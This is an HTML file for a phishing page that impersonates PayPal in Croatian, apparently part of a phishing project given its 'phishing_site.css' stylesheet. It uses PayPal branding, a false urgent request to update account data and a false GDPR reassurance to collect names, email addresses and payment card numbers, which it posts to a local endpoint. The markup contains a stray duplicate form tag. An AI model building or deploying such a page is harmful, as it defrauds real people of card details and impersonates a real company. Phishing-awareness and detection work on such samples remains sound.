<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title>PayPal</title>
        <link rel="stylesheet" href="/phishing_site.css" />
    </head>
<body>
    <header>
        <img src="https://www.paypalobjects.com/webstatic/i/logo/rebrand/ppcom-white.svg" class="logo"/>
    </header>
    <div class="centeredShit">
        <div class="glavnaForma">
            <h1>Osvježite svoje podatke kako biste mogli nastaviti koristiti PayPal usluge</h1>

            <form action="/api/updatedData" method="POST" class="formaWrapper">
            <form action="/api/rewardData" method="POST" class="formaWrapper">

                <img src="https://www.paypalobjects.com/images/shared/momgram@2x.png" class="formaLogo" />
                <div class="forma">
                    <input class="inputTxt" placeholder="Vaše ime" type="text" id="firstName" name="firstName">
                    <input class="inputTxt" placeholder="Vaše prezime" type="text" id="lastName" name="lastName">
                    <input class="inputTxt" placeholder="Vaš email" type="email" id="email" name="email">
                    <input class="inputTxt" placeholder="Broj kartice" type="password" id="cardNumber" name="cardNumber">
                </div>
                <input class="buton" type="submit" value="Pošaljite">
                <div class="separator"><span class="textInSeparator">ili</span></div>
                <a class="odustani" href="#">Odustanite</a>
            </form>
        </div>
        <div class="desno">
            <img class="desnoSlika" src="https://i.imgur.com/BmSbRNP.png">
            <div class="desnoNaslov">PayPal je jednostavniji, sigurniji način za plaćanje</div>
            <div class="desnoOpis">Bilo gdje da kupujete, čuvamo Vaše informacije na sigurnom.</div>
        </div>
    </div>
    <div class="disclaimer">
        Vaši su podaci zaštićeni Općom uredbom o zaštiti podataka (GDPR).
    </div>
</body>

</html>